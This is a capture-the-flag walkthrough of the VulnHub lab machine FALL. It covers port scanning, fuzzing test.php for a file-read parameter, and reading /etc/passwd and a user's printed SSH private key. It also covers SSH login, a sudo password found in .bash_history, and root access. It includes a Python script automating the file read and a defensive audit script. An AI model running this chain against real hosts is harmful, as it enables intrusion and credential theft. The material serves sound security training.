Target machine penetration practice 60: digitalworld.local:FALL

Published: 2023/12/14

Target description

Target URL: https://www.vulnhub.com/entry/digitalworldlocal-fall,726/

Description

To celebrate the fifth year that the author has survived his infosec career, a new box has been born! This machine resembles a few different machines in the PEN-200 environment (making it yet another OSCP-like box). More enumeration practice indeed!

If you MUST have hints for this machine: FALL is (#1): what happens when one gets careless, (#2): important in making sure we can get up, (#3): the author’s favourite season since it is a season of harvest.

1. Setting up the target environment

Attacker machine (Kali):

IP address: 192.168.9.7

Target:

IP address: 192.168.9.56

Note: the target and Kali only need to be on the same LAN (same subnet, i.e. both VMs use the same network mode).

The target environment was set up as follows:

  • Import the downloaded target VM into VirtualBox and set its network adapter to Host-Only mode.
  • In VMware, set the Kali VM's bridged-mode adapter to VirtualBox's Host-only adapter.

2. Attack walkthrough

2.1 Network scanning

2.1.1 Start the target and Kali, then scan the network

Method 1: arp-scan -I eth0 -l (scan via a specified interface)

    ➜ FALL arp-scan -I eth0 -l
    Interface: eth0, type: EN10MB, MAC: 00:50:56:27:27:36, IPv4: 192.168.9.7
    Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
    192.168.9.2     08:00:27:ed:5e:87       PCS Systemtechnik GmbH
    192.168.9.56    08:00:27:14:da:40       PCS Systemtechnik GmbH

    2 packets received by filter, 0 packets dropped by kernel
    Ending arp-scan 1.9.7: 256 hosts scanned in 1.945 seconds (131.62 hosts/sec). 2 responded

Both responders carry the 08:00:27 OUI (VirtualBox virtual NICs); 192.168.9.56 is the target.
Method 2: masscan <subnet> -p <ports>

    masscan 192.168.9.0/24 -p 80,22

Method 3: netdiscover -i <interface> -r <subnet>

    netdiscover -i eth0 -r 192.168.9.0/24

Method 4: left for readers to add.

2.1.2 Enumerate the target's open ports

Use nmap -A -sV -T4 -p- <target IP> to list the open ports (-p- covers all 65535 TCP ports, -A adds OS detection, version detection and default scripts):

    ➜ FALL nmap -A -sV -T4 -p- 192.168.9.56
    Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-29 09:26 CST
    Nmap scan report for bogon (192.168.9.56)
    Host is up (0.00036s latency).
    Not shown: 65387 filtered tcp ports (no-response), 135 filtered tcp ports (host-prohibited)
    PORT      STATE  SERVICE     VERSION
    22/tcp    open   ssh         OpenSSH 7.8 (protocol 2.0)
    | ssh-hostkey:
    |   2048 c5:86:f9:64:27:a4:38:5b:8a:11:f9:44:4b:2a:ff:65 (RSA)
    |   256 e1:00:0b:cc:59:21:69:6c:1a:c1:77:22:39:5a:35:4f (ECDSA)
    |_  256 1d:4e:14:6d:20:f4:56:da:65:83:6f:7d:33:9d:f0:ed (ED25519)
    80/tcp    open   http        Apache httpd 2.4.39 ((Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3)
    | http-robots.txt: 1 disallowed entry
    |_/
    |_http-server-header: Apache/2.4.39 (Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3
    |_http-generator: CMS Made Simple - Copyright (C) 2004-2021. All rights reserved.
    |_http-title: Good Tech Inc's Fall Sales - Home
    111/tcp   closed rpcbind
    139/tcp   open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
    443/tcp   open   ssl/http    Apache httpd 2.4.39 ((Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3)
    | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
    | Subject Alternative Name: DNS:localhost.localdomain
    | Not valid before: 2019-08-15T03:51:33
    |_Not valid after:  2020-08-19T05:31:33
    |_ssl-date: TLS randomness does not represent time
    |_http-server-header: Apache/2.4.39 (Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3
    | tls-alpn:
    |_  http/1.1
    | http-robots.txt: 1 disallowed entry
    |_/
    |_http-generator: CMS Made Simple - Copyright (C) 2004-2021. All rights reserved.
    |_http-title: Good Tech Inc's Fall Sales - Home
    445/tcp   open   netbios-ssn Samba smbd 4.8.10 (workgroup: SAMBA)
    3306/tcp  open   mysql       MySQL (unauthorized)
    8000/tcp  closed http-alt
    8080/tcp  closed http-proxy
    8443/tcp  closed https-alt
    9090/tcp  open   http        Cockpit web service 162 - 188
    |_http-title: Did not follow redirect to https://bogon:9090/
    10080/tcp closed amanda
    10443/tcp closed cirrossp
    MAC Address: 08:00:27:14:DA:40 (Oracle VirtualBox virtual NIC)
    Device type: general purpose
    Running: Linux 5.X
    OS CPE: cpe:/o:linux:linux_kernel:5
    OS details: Linux 5.0 - 5.4
    Network Distance: 1 hop
    Service Info: Host: FALL; OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Host script results:
    |_clock-skew: mean: 10h19m57s, deviation: 4h02m29s, median: 7h59m57s
    | smb-os-discovery:
    |   OS: Windows 6.1 (Samba 4.8.10)
    |   Computer name: fall
    |   NetBIOS computer name: FALL\x00
    |   Domain name: \x00
    |   FQDN: fall
    |_  System time: 2022-03-29T02:29:15-07:00
    | smb-security-mode:
    |   account_used: <blank>
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: disabled (dangerous, but default)
    | smb2-time:
    |   date: 2022-03-29T09:29:26
    |_  start_date: N/A
    | smb2-security-mode:
    |   3.1.1:
    |_    Message signing enabled but not required

    TRACEROUTE
    HOP RTT     ADDRESS
    1   0.36 ms bogon (192.168.9.56)

    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 174.82 seconds

The following ports are open:

22 - ssh - OpenSSH 7.8 (protocol 2.0)

80 - http - Apache httpd 2.4.39 ((Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3)

139 - netbios-ssn - Samba smbd 3.X - 4.X (workgroup: SAMBA)

443 - ssl/http - Apache httpd 2.4.39 ((Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3)

445 - netbios-ssn - Samba smbd 4.8.10 (workgroup: SAMBA)

3306 - mysql - MySQL (unauthorized)

9090 - http - Cockpit web service 162 - 188 (the Cockpit web console, which redirects to https://<host>:9090/)

Port 80 is running CMS Made Simple (identified by the http-generator meta tag).

2.2 Vulnerability enumeration

2.2.1 Port 80 analysis

Visit http://192.168.9.56/

[Screenshot of the http://192.168.9.56/ home page (image not recoverable)]

The page mentions a user named qiu, and also mentions a test script sitting in the site's web root.

Brute-force the directory tree: gobuster dir -u http://192.168.9.56 -x html,zip,bak,txt,php --wordlist=/usr/share/wordlists/dirb/common.txt

    ➜ FALL gobuster dir -u http://192.168.9.56 -x html,zip,bak,txt,php --wordlist=/usr/share/wordlists/dirb/common.txt
    ===============================================================
    Gobuster v3.1.0
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
    ===============================================================
    [+] Url:                     http://192.168.9.56
    [+] Method:                  GET
    [+] Threads:                 10
    [+] Wordlist:                /usr/share/wordlists/dirb/common.txt
    [+] Negative Status codes:   404
    [+] User Agent:              gobuster/3.1.0
    [+] Extensions:              txt,php,html,zip,bak
    [+] Timeout:                 10s
    ===============================================================
    2022/03/29 10:15:52 Starting gobuster in directory enumeration mode
    ===============================================================
    /.hta                 (Status: 403) [Size: 213]
    /.hta.php             (Status: 403) [Size: 217]
    /.hta.html            (Status: 403) [Size: 218]
    /.hta.zip             (Status: 403) [Size: 217]
    /.htaccess.bak        (Status: 403) [Size: 222]
    /.htpasswd.html       (Status: 403) [Size: 223]
    /.htpasswd            (Status: 403) [Size: 218]
    /.htaccess            (Status: 403) [Size: 218]
    /.hta.bak             (Status: 403) [Size: 217]
    /.htaccess.txt        (Status: 403) [Size: 222]
    /.htpasswd.zip        (Status: 403) [Size: 222]
    /.hta.txt             (Status: 403) [Size: 217]
    /.htaccess.php        (Status: 403) [Size: 222]
    /.htpasswd.bak        (Status: 403) [Size: 222]
    /.htaccess.html       (Status: 403) [Size: 223]
    /.htpasswd.txt        (Status: 403) [Size: 222]
    /.htaccess.zip        (Status: 403) [Size: 222]
    /.htpasswd.php        (Status: 403) [Size: 222]
    /admin.pl.html        (Status: 403) [Size: 222]
    /admin.pl.zip         (Status: 403) [Size: 221]
    /admin.pl.bak         (Status: 403) [Size: 221]
    /admin.pl             (Status: 403) [Size: 217]
    /admin.cgi.bak        (Status: 403) [Size: 222]
    /admin.pl.txt         (Status: 403) [Size: 221]
    /admin.cgi.txt        (Status: 403) [Size: 222]
    /admin.cgi.html       (Status: 403) [Size: 223]
    /admin.cgi            (Status: 403) [Size: 218]
    /admin.cgi.zip        (Status: 403) [Size: 222]
    /admin                (Status: 301) [Size: 234] [--> http://192.168.9.56/admin/]
    /AT-admin.cgi.txt     (Status: 403) [Size: 225]
    /AT-admin.cgi.html    (Status: 403) [Size: 226]
    /AT-admin.cgi.zip     (Status: 403) [Size: 225]
    /assets               (Status: 301) [Size: 235] [--> http://192.168.9.56/assets/]
    /AT-admin.cgi         (Status: 403) [Size: 221]
    /AT-admin.cgi.bak     (Status: 403) [Size: 225]
    /cachemgr.cgi.zip     (Status: 403) [Size: 225]
    /cachemgr.cgi.bak     (Status: 403) [Size: 225]
    /cachemgr.cgi.txt     (Status: 403) [Size: 225]
    /cachemgr.cgi         (Status: 403) [Size: 221]
    /cachemgr.cgi.html    (Status: 403) [Size: 226]
    /cgi-bin/             (Status: 403) [Size: 217]
    /cgi-bin/.html        (Status: 403) [Size: 222]
    /config.php           (Status: 200) [Size: 0]
    /doc                  (Status: 301) [Size: 232] [--> http://192.168.9.56/doc/]
    /error.html           (Status: 200) [Size: 80]
    /favicon.ico          (Status: 200) [Size: 1150]
    /index.php            (Status: 200) [Size: 8331]
    /index.php            (Status: 200) [Size: 8331]
    /lib                  (Status: 301) [Size: 232] [--> http://192.168.9.56/lib/]
    /missing.html         (Status: 200) [Size: 168]
    /modules              (Status: 301) [Size: 236] [--> http://192.168.9.56/modules/]
    /phpinfo.php          (Status: 200) [Size: 17]
    /phpinfo.php          (Status: 200) [Size: 17]
    /robots.txt           (Status: 200) [Size: 79]
    /robots.txt           (Status: 200) [Size: 79]
    /test.php             (Status: 200) [Size: 80]
    /tmp                  (Status: 301) [Size: 232] [--> http://192.168.9.56/tmp/]
    /uploads              (Status: 301) [Size: 236] [--> http://192.168.9.56/uploads/]
    ===============================================================
    2022/03/29 10:15:56 Finished
    ===============================================================
    ➜ FALL

test.php is present (note its size: 80 bytes).

Visit http://192.168.9.56/test.php

It only prints a message saying a GET parameter is missing; the parameter name is not given.

2.3 Exploitation

2.3.1 Fuzzing test.php for a file-inclusion parameter with wfuzz

Fuzz the parameter name with wfuzz. --hh 80 hides every response that is 80 characters long, which is the size of the "missing parameter" page gobuster reported for /test.php, so the only hit is a parameter name the script actually reacts to: file.

    ➜ FALL wfuzz -u "http://192.168.9.56/test.php?FUZZ=aaa" -w /usr/share/seclists/Discovery/Web-Content/common.txt --hh 80
    /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
    ********************************************************
    * Wfuzz 3.1.0 - The Web Fuzzer                         *
    ********************************************************

    Target: http://192.168.9.56/test.php?FUZZ=aaa
    Total requests: 4711

    =====================================================================
    ID           Response   Lines    Word       Chars       Payload
    =====================================================================

    000001783:   200        0 L      0 W        0 Ch        "file"

    Total time: 2.775117
    Processed Requests: 4711
    Filtered Requests: 4710
    Requests/sec.: 1697.585

Test whether the parameter reads files:

view-source:http://192.168.9.56/test.php?file=/etc/passwd

/etc/passwd comes back, confirming an arbitrary file read. It also confirms that user qiu exists with uid 1000.
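The two steps above (find the parameter name by response-size differencing, then read a file through it) re-implemented as a small script. This is an added example, not part of the original write-up: the target URL is the lab box from this page, the short candidate list stands in for common.txt, and the `fetch` callable is injectable so the block runs offline against a constructed stand-in for test.php; swap in `http_fetch` to run it against a real host.

```python
"""Parameter-name discovery by response-size differencing (what
`wfuzz --hh 80` did above), then a file read through the discovered
parameter and triage of /etc/passwd.  Added example, not the write-up's code."""
import urllib.parse
import urllib.request
from typing import Callable, Dict, Iterable, List, Optional, Tuple

Fetch = Callable[[str], bytes]   # maps a URL to the raw response body


def http_fetch(url: str, timeout: float = 5.0) -> bytes:
    """Live fetcher: GET the URL; any network/HTTP error counts as an empty body."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.read()
    except Exception:
        return b""


def find_param(base_url: str, candidates: Iterable[str],
               fetch: Fetch = http_fetch, canary: str = "aaa") -> Optional[str]:
    """Return the first candidate whose response size differs from the baseline.

    The baseline is the page returned for a name the script certainly ignores
    (the 'missing parameter' page); a different size means the script reacted."""
    baseline = len(fetch(f"{base_url}?{urllib.parse.urlencode({'zz_not_a_param': canary})}"))
    for name in candidates:
        body = fetch(f"{base_url}?{urllib.parse.urlencode({name: canary})}")
        if len(body) != baseline:
            return name
    return None


def read_file(base_url: str, param: str, path: str, fetch: Fetch = http_fetch) -> str:
    """Fetch an arbitrary file through the disclosed parameter."""
    return fetch(f"{base_url}?{urllib.parse.urlencode({param: path})}").decode("utf-8", "replace")


NOLOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false"}


def interactive_users(passwd: str, min_uid: int = 1000) -> List[Tuple[str, int, str]]:
    """(name, uid, home) for accounts with a real shell and uid >= min_uid:
    the triage the write-up did by eye to spot qiu (uid 1000)."""
    found = []
    for line in passwd.splitlines():
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            continue
        name, uid, home, shell = fields[0], int(fields[2]), fields[5], fields[6]
        if uid >= min_uid and shell not in NOLOGIN_SHELLS:
            found.append((name, uid, home))
    return found


def key_paths(users: List[Tuple[str, int, str]]) -> List[str]:
    """Private-key locations worth requesting next through the file read."""
    return [f"{home}/.ssh/{k}" for _, _, home in users
            for k in ("id_rsa", "id_ecdsa", "id_ed25519")]


# --- constructed stand-in for test.php so the block runs offline (assumption) ---
MISSING_PARAM_PAGE = b"<html><body>Missing GET parameter</body></html>"
FAKE_FS: Dict[str, bytes] = {
    "/etc/passwd": (b"root:x:0:0:root:/root:/bin/bash\n"
                    b"apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin\n"
                    b"qiu:x:1000:1000::/home/qiu:/bin/bash\n"),
}


def fake_fetch(url: str) -> bytes:
    """Mimics the observed behaviour: fixed error page unless `file` is given,
    the file's bytes if it exists, an empty body otherwise (the 0 Ch wfuzz saw)."""
    query = urllib.parse.parse_qs(urllib.parse.urlsplit(url).query)
    if "file" not in query:
        return MISSING_PARAM_PAGE
    return FAKE_FS.get(query["file"][0], b"")


TARGET = "http://192.168.9.56/test.php"
WORDLIST = ["id", "page", "cmd", "file", "path"]   # stand-in for common.txt


def run(fetch: Fetch = fake_fetch):
    """Full chain: discover the parameter, read /etc/passwd, list real users."""
    param = find_param(TARGET, WORDLIST, fetch)
    if param is None:
        return None, []
    return param, interactive_users(read_file(TARGET, param, "/etc/passwd", fetch))


if __name__ == "__main__":
    param, users = run()
    print("parameter:", param, "users:", users, "keys to try:", key_paths(users))
```

Against the real box, `run(http_fetch)` with the full wordlist reproduces the wfuzz result; the size comparison is the whole trick, which is why a script that returns a fixed-size error page for unknown names is so easy to fuzz.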

Try reading qiu's SSH private key: view-source:http://192.168.9.56/test.php?file=/home/qiu/.ssh/id_rsa

The web server process can read it, and it comes back as:

    -----BEGIN OPENSSH PRIVATE KEY-----
    b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
    NhAAAAAwEAAQAAAQEAvNjhOFOSeDHy9K5vnHSs3qTjWNehAPzT0sD3beBPVvYKQJt0AkD0
    FDcWTSSF13NhbjCQm5fnzR8td4sjJMYiAl+vAKboHne0njGkBwdy5PgmcXyeZTECIGkggX
    61kImUOIqtLMcjF5ti+09RGiWeSmfIDtTCjj/+uQlokUMtdc4NOv4XGJbp7GdEWBZevien
    qXoXtG6j7gUgtXX1Fxlx3FPhxE3lxw/AfZ9ib21JGlOyy8cflTlogrZPoICCXIV/kxGK0d
    Zucw8rGGMc6Jv7npeQS1IXU9VnP3LWlOGFU0j+IS5SiNksRfdQ4mCN9SYhAm9mAKcZW8wS
    vXuDjWOLEwAAA9AS5tRmEubUZgAAAAdzc2gtcnNhAAABAQC82OE4U5J4MfL0rm+cdKzepO
    NY16EA/NPSwPdt4E9W9gpAm3QCQPQUNxZNJIXXc2FuMJCbl+fNHy13iyMkxiICX68Apuge
    d7SeMaQHB3Lk+CZxfJ5lMQIgaSCBfrWQiZQ4iq0sxyMXm2L7T1EaJZ5KZ8gO1MKOP/65CW
    iRQy11zg06/hcYlunsZ0RYFl6+J6epehe0bqPuBSC1dfUXGXHcU+HETeXHD8B9n2JvbUka
    U7LLxx+VOWiCtk+ggIJchX+TEYrR1m5zDysYYxzom/uel5BLUhdT1Wc/ctaU4YVTSP4hLl
    KI2SxF91DiYI31JiECb2YApxlbzBK9e4ONY4sTAAAAAwEAAQAAAQArXIEaNdZD0vQ+Sm9G
    NWQcGzA4jgph96uLkNM/X2nYRdZEz2zrt45TtfJg9CnnNo8AhhYuI8sNxkLiWAhRwUy9zs
    qYE7rohAPs7ukC1CsFeBUbqcmU4pPibUERes6lyXFHKlBpH7BnEz6/BY9RuaGG5B2DikbB
    8t/CDO79q7ccfTZs+gOVRX4PW641+cZxo5/gL3GcdJwDY4ggPwbU/m8sYsyN1NWJ8NH00d
    X8THaQAEXAO6TTzPMLgwJi+0kj1UTg+D+nONfh7xeXLseST0m1p+e9C/8rseZsSJSxoXKk
    CmDy69aModcpW+ZXl9NcjEwrMvJPLLKjhIUcIhNjf4ABAAAAgEr3ZKUuJquBNFPhEUgUic
    ivHoZH6U82VyEY2Bz24qevcVz2IcAXLBLIp+f1oiwYUVMIuWQDw6LSon8S72kk7VWiDrWz
    lHjRfpUwWdzdWSMY6PI7EpGVVs0qmRC/TTqOIH+FXA66cFx3X4uOCjkzT0/Es0uNyZ07qQ
    58cGE8cKrLAAAAgQDlPajDRVfDWgOWJj+imXfpGsmo81UDaYXwklzw4VM2SfIHIAFZPaA0
    acm4/icKGPlnYWsvZCksvlUck+ti+J2RS2Mq9jmKB0AVZisFazj8qIde3SPPwtR7gBR329
    JW3Db+KISMRIvdpJv+eiKQLg/epbSdwXZi0DJoB0a15FsIAQAAAIEA0uQl0d0p3NxCyT/+
    Q6N+llf9TB5+VNjinaGu4DY6qVrSHmhkceHtXxG6h9upRtKw5BvOlSbTatlfMZYUtlZ1mL
    RWCU8D7v1Qn7qMflx4bldYgV8lf18sb6g/uztWJuLpFe3Ue/MLgeJ+2TiAw9yYoPVySNK8
    uhSHa0dvveoJ8xMAAAAZcWl1QGxvY2FsaG9zdC5sb2NhbGRvbWFpbgEC
    -----END OPENSSH PRIVATE KEY-----

Save it locally as id_rsa and run chmod 600 id_rsa, otherwise ssh refuses to use a key with loose permissions.

Try key-based SSH login:

    ➜ FALL ssh qiu@192.168.9.56 -i id_rsa
    The authenticity of host '192.168.9.56 (192.168.9.56)' can't be established.
    ED25519 key fingerprint is SHA256:EKK1u2kbhexzA1ZV6xNgdbmDeKiF8lfhmk+8sHl47DY.
    This key is not known by any other names
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    Warning: Permanently added '192.168.9.56' (ED25519) to the list of known hosts.
    Web console: https://FALL:9090/

    Last login: Sun Sep 5 19:28:51 2021
    [qiu@FALL ~]$

Login succeeds without a passphrase; the key was stored unencrypted. The "Web console" banner is the Cockpit service seen on port 9090.

2.4 Privilege escalation

2.4.1 Information gathering

Routine enumeration. Note that qiu is in the wheel group, which on Fedora is normally granted sudo ALL, so the only thing standing between this shell and root is qiu's password:

    [qiu@FALL ~]$ id
    uid=1000(qiu) gid=1000(qiu) groups=1000(qiu),10(wheel)
    [qiu@FALL ~]$ sudo -l
    [sudo] password for qiu:
    Sorry, try again.
    [sudo] password for qiu:
    Sorry, try again.
    [sudo] password for qiu:
    sudo: 3 incorrect password attempts
    [qiu@FALL ~]$ ls -al
    total 24
    drwxr-xr-x. 3 qiu  qiu  128 May 21  2021 .
    drwxr-xr-x. 3 root root  17 Aug 14  2019 ..
    -rw-------  1 qiu  qiu  292 Sep  5  2021 .bash_history
    -rw-r--r--. 1 qiu  qiu   18 Mar 15  2018 .bash_logout
    -rw-r--r--. 1 qiu  qiu  193 Mar 15  2018 .bash_profile
    -rw-r--r--. 1 qiu  qiu  231 Mar 15  2018 .bashrc
    -rw-r--r--  1 qiu  qiu   27 May 21  2021 local.txt
    -rw-rw-r--  1 qiu  qiu   38 May 21  2021 reminder
    drwxr-xr-x  2 qiu  qiu   61 May 21  2021 .ssh

Look for SUID binaries from the shell: find / -perm -u=s -type f 2>/dev/null

    [qiu@FALL ~]$ find / -perm -u=s -type f 2>/dev/null
    /usr/bin/fusermount
    /usr/bin/chage
    /usr/bin/gpasswd
    /usr/bin/newgrp
    /usr/bin/su
    /usr/bin/mount
    /usr/bin/umount
    /usr/bin/ksu
    /usr/bin/pkexec
    /usr/bin/passwd
    /usr/bin/crontab
    /usr/bin/at
    /usr/bin/chfn
    /usr/bin/chsh
    /usr/bin/sudo
    /usr/sbin/pam_timestamp_check
    /usr/sbin/unix_chkpwd
    /usr/sbin/userhelper
    /usr/sbin/usernetctl
    /usr/sbin/mount.nfs
    /usr/sbin/mtr-packet
    /usr/lib/polkit-1/polkit-agent-helper-1
    /usr/libexec/dbus-1/dbus-daemon-launch-helper
    /usr/libexec/cockpit-session
    /usr/libexec/abrt-action-install-debuginfo-to-abrt-cache

Checked against https://gtfobins.github.io/; nothing in this list is directly abusable.

Look at the contents of .bash_history:

    [qiu@FALL ~]$ cat .bash_history
    ls -al
    cat .bash_history
    rm .bash_history
    echo "remarkablyawesomE" | sudo -S dnf update
    ifconfig
    ping www.google.com
    ps -aux
    ps -ef | grep apache
    env
    env > env.txt
    rm env.txt
    lsof -i tcp:445
    lsof -i tcp:80
    ps -ef
    lsof -p 1930
    lsof -p 2160
    rm .bash_history
    exit
    ls -al
    cat .bash_history
    exit
    [qiu@FALL ~]$

The string remarkablyawesomE was piped into sudo -S (which reads the password from stdin), so it is almost certainly qiu's password. Deleting .bash_history did not help the user: the shell wrote the history out again on exit.

Try sudo -l again with it:

    [qiu@FALL ~]$ sudo -l
    [sudo] password for qiu:
    Matching Defaults entries for qiu on FALL:
        !visiblepw, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
        env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
        env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
        env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
        env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
        secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

    User qiu may run the following commands on FALL:
        (ALL) ALL
    [qiu@FALL ~]$

It is indeed qiu's password, and qiu may run any command as any user via sudo.

Escalate with sudo:

    [qiu@FALL ~]$ sudo su
    [root@FALL qiu]# cd /root
    [root@FALL ~]# ls -al
    total 40
    dr-xr-x---.  3 root root  206 Sep  5  2021 .
    dr-xr-xr-x. 17 root root  244 May 21  2021 ..
    -rw-------.  1 root root 3963 Aug 14  2019 anaconda-ks.cfg
    -rw-------   1 root root   57 Sep  5  2021 .bash_history
    -rw-r--r--.  1 root root   18 Feb  9  2018 .bash_logout
    -rw-r--r--.  1 root root  176 Feb  9  2018 .bash_profile
    -rw-r--r--.  1 root root  176 Feb  9  2018 .bashrc
    -rw-r--r--.  1 root root  100 Feb  9  2018 .cshrc
    -rw-------.  1 root root 3151 Aug 14  2019 original-ks.cfg
    ----------   1 root root   30 May 21  2021 proof.txt
    -r--------   1 root root  452 Aug 30  2021 remarks.txt
    drwx------   2 root root   25 Sep  5  2021 .ssh
    -rw-r--r--.  1 root root  129 Feb  9  2018 .tcshrc
    [root@FALL ~]# cat proof.txt
    Congrats on a root shell! :-)
    [root@FALL ~]#

Privilege escalation succeeded and the root flag is in hand.
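Both footholds on this box came from carelessness in qiu's home directory: a private key the web server could read, and a password typed into a pipeline and preserved in .bash_history. The following is an added example, not part of the write-up, of a small audit that flags exactly those two conditions; the history-scanning and permission checks are pure functions so they can be exercised on constructed input (the sample lines below are taken from qiu's history as shown on this page), and audit_home() applies them to a real home directory.

```python
"""Audit one home directory for the two 'careless' findings on this box:
private keys readable by other users/processes, and secrets that ended up
in shell history through sudo -S, sshpass, mysql -p and --password=.
Added example, not the write-up's code."""
import os
import re
import stat
from typing import Dict, Iterable, List, Tuple

# Command shapes that put a secret on the command line, and so into history.
SECRET_PATTERNS = {
    "sudo -S via echo": re.compile(r'echo\s+["\']?(?P<secret>[^"\'|]+?)["\']?\s*\|\s*sudo\s+-S'),
    "sshpass -p":       re.compile(r'sshpass\s+-p\s*["\']?(?P<secret>[^"\'\s]+)'),
    "mysql -p<pw>":     re.compile(r'\bmysql\w*\b[^|;]*\s-p(?P<secret>[^\s"\']+)'),
    "--password=":      re.compile(r'--password[= ](?P<secret>[^\s"\']+)'),
}


def find_history_secrets(lines: Iterable[str]) -> List[Tuple[int, str, str]]:
    """(line number, pattern label, secret) for every history line that leaks one."""
    hits = []
    for n, line in enumerate(lines, 1):
        for label, pat in SECRET_PATTERNS.items():
            m = pat.search(line)
            if m:
                hits.append((n, label, m.group("secret").strip()))
                break
    return hits


def key_is_exposed(mode: int) -> bool:
    """True if group or other hold any permission bit on a private key.

    ssh refuses to *use* such a key, but nothing stops another local account,
    or the web server's PHP, from reading it: that is how this box's id_rsa
    was fetched through test.php?file=..."""
    return bool(stat.S_IMODE(mode) & 0o077)


def is_private_key(path: str) -> bool:
    """Cheap content check: PEM/OpenSSH private keys start with '-----BEGIN'."""
    try:
        with open(path, "rb") as f:
            return f.read(32).startswith(b"-----BEGIN")
    except OSError:
        return False


def audit_home(home: str) -> Dict[str, list]:
    """Walk a home directory; report exposed keys and history files that leak secrets."""
    report: Dict[str, list] = {"exposed_keys": [], "history_secrets": []}
    for root, _dirs, files in os.walk(home):
        for name in files:
            path = os.path.join(root, name)
            if name.endswith("_history"):
                try:
                    with open(path, "r", errors="replace") as f:
                        for n, label, secret in find_history_secrets(f):
                            report["history_secrets"].append((path, n, label, secret))
                except OSError:
                    pass
            elif is_private_key(path):
                mode = os.stat(path).st_mode
                if key_is_exposed(mode):
                    report["exposed_keys"].append((path, oct(stat.S_IMODE(mode))))
    return report


# Constructed sample: the relevant lines of qiu's .bash_history from the write-up.
SAMPLE_HISTORY = [
    "ls -al",
    "rm .bash_history",
    'echo "remarkablyawesomE" | sudo -S dnf update',
    "ps -ef | grep apache",
    "env > env.txt",
]

if __name__ == "__main__":
    print(find_history_secrets(SAMPLE_HISTORY))
    print(audit_home(os.path.expanduser("~")))
```

Run as root over /home/* this finds both of this box's mistakes in one pass; the fix on the key side is chmod 600 on the key (and 700 on .ssh), and on the history side a password should never be echoed into sudo -S in the first place.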

Summary

This box is fairly easy. Directory brute-forcing, combined with the hint on the front page, points straight at test.php; wfuzz then recovers its file parameter by filtering on response size; the arbitrary file read exposes qiu's unencrypted SSH private key, which is saved locally and used to log in; .bash_history yields qiu's password (piped into sudo -S); and since qiu is in wheel with (ALL) ALL in sudoers, sudo gives root.

